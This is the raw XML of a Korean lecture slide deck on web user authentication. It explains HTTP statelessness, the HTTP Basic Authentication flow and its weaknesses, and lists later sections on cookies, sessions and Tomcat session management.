                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9BECBE4-0507-3F05-9EE2-166E9C459EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114719" y="4659079"/>
            <a:ext cx="509130" cy="208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3" name="직사각형 2">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81223BF9-3134-3CBB-CE64-AC7996236C82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126914" y="4402320"/>
            <a:ext cx="1056609" cy="229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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="직사각형 3">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB04AE2-B0BD-EAA6-54C9-D5C2EAF998F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126914" y="4161704"/>
            <a:ext cx="1056609" cy="212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GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              <a:ea typeface="Pretendard GOV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50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99E01-34EC-6D5F-E5D9-FC255AFA5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3C5602C-D77F-443D-9159-F407C72C60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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 지향한다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B3383-E1A9-8892-A785-FDFC8E587FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="2398385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Stateful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A9B10-6544-5AF4-AC41-E7F2A6C605F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1742400" y="239838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서버가 클라이언트의 정보를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0C499-155F-407F-1C22-134055110ED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6283134" y="239838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Stateless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69BE5-DE37-9DDA-6205-7C7806DDC6D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7733845" y="2398385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서버가 클라이언트의 정보를 저장하지 않음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387B2-A523-9360-EE80-0473EF0B5A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="3084021"/>
            <a:ext cx="5570756" cy="21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중간에 다른 서버로 변경되면 안 됨</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>변경을 위해서는 다른 서버에 미리 정보가 저장되어야 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항상 같은 서버가 유지되거나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다른 서버에 미리 정보가 유지되어야 해 서버 확장이 힘듦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B44F-B3EC-DE92-95B0-F2835B062DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254273" y="3084021"/>
            <a:ext cx="5769528" cy="21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중간에 다른 서버로 변경되어도 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요청 시 클라이언트가 서버가 원하는 정보를</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>추가로 전송해야 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항상 같은 서버에 연결될 필요가 없으므로 서버 확장이 용이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91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8900D-B584-99B2-775A-721121875F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Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 설계 시 로그인을 어떻게 유지하는가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CE864-3F11-AE9E-C300-5422CE2D042A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207818" y="1321724"/>
            <a:ext cx="7255512" cy="459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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 지향하므로 서버는 클라이언트 정보를 저장하지 않음</a:t>
            </a:r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DB6E21-5F99-121F-F747-95E5F490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02" y="2270187"/>
            <a:ext cx="1736985" cy="205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F2546EA-E695-CFFC-490B-89090061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13" y="2270187"/>
            <a:ext cx="2051894" cy="205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5E9CCC3-B7F0-CDD5-172C-5BE93B1A218E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907330" y="3090359"/>
            <a:ext cx="255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13A8FC-AF63-C3ED-15C8-D581AF2B3EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5517957" y="260504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저 아시죠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EBA3028-B0DD-0C41-F2FC-78CC9A96A11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4907330" y="3525391"/>
            <a:ext cx="255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535AF1-D0F6-1F74-D7F9-5901B49D7C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279473" y="3683369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아저씨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>누군데요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5DBA0-277B-016C-760E-637F30B78568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="4810611"/>
            <a:ext cx="8948283" cy="12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우리가 사용하는 서비스들은 모두 다른 페이지를 요청할 때마다 인증 과정을 거치지 않고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사용자에게 인증이 완료된 페이지를 제공하고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이는 클라이언트와 서버가 클라이언트에 대한 인증 정보를 어딘가 저장해 사용하고 있음을 의미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425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47E77A6-EAE4-CD0A-B459-9F54D96D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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209770" y="0"/>
            <a:ext cx="7759759" cy="3762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0022CA-AE32-15F9-5A28-D935C241E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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>HTTP Basic Authentication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10CF29-97C0-7210-620A-371D1708B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8F753A-BFDA-1A90-D32F-F14937E86FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9963716" y="0"/>
            <a:ext cx="2228283" cy="48768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1852CB-AB10-4417-F2C8-6445CF8BE10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2215581" cy="48768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3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972C51A-80B7-4846-11EC-C85BD28A49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Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인증 과정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80CF8C-9C44-9844-9A43-2E1CB44C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02" y="1300707"/>
            <a:ext cx="2491698" cy="294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0870C22-D278-04C8-4572-18CD07DF0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9" y="1145431"/>
            <a:ext cx="2051894" cy="205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E99B93A-ABA4-987C-AD75-D7F197EA7C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="2069279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544BE7-E3F6-64A8-A4A8-C270EBED3ACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="162306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GET /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EB7D7D5-04F9-88B0-CCCA-D467B38B6AEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2773730" y="3133004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471076-D264-E92C-7A2B-A9C81CA30C2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773731" y="2449257"/>
            <a:ext cx="69265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401 Unauthorized</a:t>
            </a:r>
          </a:p>
          <a:p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WWW-Authenticate: Basic realm=“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사용자 권한이 적용되는 영역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(deprecated)"</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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4811DF-9FBF-AB4A-34E9-C2827DAD78AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="4881059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4BA7C628-0BC0-94D7-10E2-BCF876E64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1" y="3603161"/>
            <a:ext cx="2070507" cy="14410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AD0AEB-F30A-45CD-30DE-E6C4302C9ED5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706079" y="4129670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GET /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Authorization: Basic BASE64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로 인코딩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사용자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ID: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비밀번호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1CC02E8-54CE-1B1E-CEAA-0F83B9579946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2773730" y="5825859"/>
            <a:ext cx="69265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306586C-BD64-4811-B618-153E6D22512F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="53808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200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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OK</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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B17B91-67CB-A8EC-AC6E-4014DE21973C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="596763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403 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Forbidden</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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AEDD58-B8ED-8982-F290-642E67189F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4236720" y="3429001"/>
            <a:ext cx="5463581" cy="9201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비밀번호의 특수문자 또는 알파벳이 아닌 문자가 인코딩 방식에 따라 다르게 읽힐 수 있는 문제를 방지하고자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 인코딩해 전송</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29346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915D2-575A-780E-A9CB-7186ECA72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HTTP Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인증 시 주의사항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22B75-8F3F-60A0-A2B8-536AEA65E2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="1607820"/>
            <a:ext cx="10273966" cy="3783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일반적으로 사용자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>와 비밀번호를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>BASE64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 인코딩하여 전송하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>보안에 취약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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>요청은 일반 텍스트 그대로 전송해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>HTTP Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인증은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 권장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SSL/TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 사용해 요청과 응답을 암호화해 전송해야 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서버에서 사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>로그아웃할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 수 있는 방법을 제공하지 않음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브라우저의 캐시 저장소에 저장됨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클라이언트가 요청 시마다 서버가 아이디와 비밀번호가 일치하는 사용자를 데이터베이스에서 매번 조회하므로</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자가 많다면 서버 성능이 저하됨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일부 페이지 접근 차단 등 정교하게 사용자 권한을 제어하는 과정이 복잡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346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033B07-15E0-9719-567A-1F10DB8F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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>HTTP Cookie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0F80C3-9589-69C8-C608-F65DD8D91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Kilner 2 Litre Glass Storage Cookie Jar Pasta Rice Biscuit ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7E66AAE-CD01-BDB4-F064-22FE9AE9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190" y="1440180"/>
            <a:ext cx="3604260" cy="360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6CECC9-1BE9-8325-428A-D7D5B31AE2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7644130" y="5101470"/>
            <a:ext cx="3754554" cy="471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쿠키라는 이름의 유래에 대한 추측 중 하나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>, Cookie Jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="500" i="1" dirty="0"/>
              <a:t>사진</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0" err="1"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0" err="1"/>
              <a:t>ProdBuy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0"/>
              <a:t> Ltd : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="500" i="1" dirty="0"/>
              <a:t>다용도 유리병</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0"/>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="500" i="1" dirty="0"/>
              <a:t>만 원</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="500" i="1" dirty="0"/>
              <a:t>)              </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="500" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18290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retendard GOV">
      <a:majorFont>
        <a:latin typeface="Pretendard GOV Black"/>
        <a:ea typeface="Pretendard GOV Black"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Pretendard GOV"/>
        <a:ea typeface="Pretendard GOV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</TotalTime>
  <Words>1281</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>174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Pretendard GOV</vt:lpstr>
      <vt:lpstr>Pretendard GOV Black</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>D2Coding</vt:lpstr>
      <vt:lpstr>1_Office 테마</vt:lpstr>
      <vt:lpstr>사용자 인증: 쿠키와 세션</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>HTTP는 Stateless를 지향한다</vt:lpstr>
      <vt:lpstr>HTTP는 Stateless를 지향한다</vt:lpstr>
      <vt:lpstr>Stateless로 설계 시 로그인을 어떻게 유지하는가? </vt:lpstr>
      <vt:lpstr>01. HTTP Basic Authentication</vt:lpstr>
      <vt:lpstr>Basic 인증 과정</vt:lpstr>
      <vt:lpstr>HTTP Basic 인증 시 주의사항</vt:lpstr>
      <vt:lpstr>02. HTTP Cookie</vt:lpstr>
      <vt:lpstr>쿠키</vt:lpstr>
      <vt:lpstr>쿠키의 생성과 저장 과정</vt:lpstr>
      <vt:lpstr>쿠키 문제점과 예방</vt:lpstr>
      <vt:lpstr>로그인 시 쿠키에 아이디와 비밀번호를 저장할까?</vt:lpstr>
      <vt:lpstr>03. Session</vt:lpstr>
      <vt:lpstr>세션</vt:lpstr>
      <vt:lpstr>세션의 생성과 저장 과정</vt:lpstr>
      <vt:lpstr>세션</vt:lpstr>
      <vt:lpstr>04. Tomcat 세션 관리</vt:lpstr>
      <vt:lpstr>Spring 애플리케이션을 통한 세션 생성 확인</vt:lpstr>
      <vt:lpstr>Spring 애플리케이션을 통한 세션 생성 확인</vt:lpstr>
      <vt:lpstr>Spring 애플리케이션을 통한 세션 생성 확인</vt:lpstr>
      <vt:lpstr>Spring 애플리케이션을 통한 세션 생성 확인</vt:lpstr>
      <vt:lpstr>NAVER의 세션</vt:lpstr>
      <vt:lpstr>HttpSession의 구현체, StandardSession</vt:lpstr>
      <vt:lpstr>HttpSession의 구현체, StandardSession</vt:lpstr>
      <vt:lpstr>이 소스 코드를 통해 알 수 있는 점</vt:lpstr>
      <vt:lpstr>HttpServletRequest의 구현체, Request</vt:lpstr>
      <vt:lpstr>Manager의 구현체, ManagerBase</vt:lpstr>
      <vt:lpstr>박연종, 프로젝트의 일원이 되다 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쿠키와 세션</dc:title>
  <dc:creator>Yeonjong PARK</dc:creator>
  <cp:lastModifiedBy>Yeonjong PARK</cp:lastModifiedBy>
  <cp:revision>80</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-05T13:23:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T05:18:21Z</dcterms:modified>
</cp:coreProperties>
</file>